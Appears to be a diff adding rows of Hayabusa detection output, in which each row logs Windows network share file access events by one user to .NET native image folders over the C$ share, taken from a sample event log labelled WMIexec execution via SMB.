+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
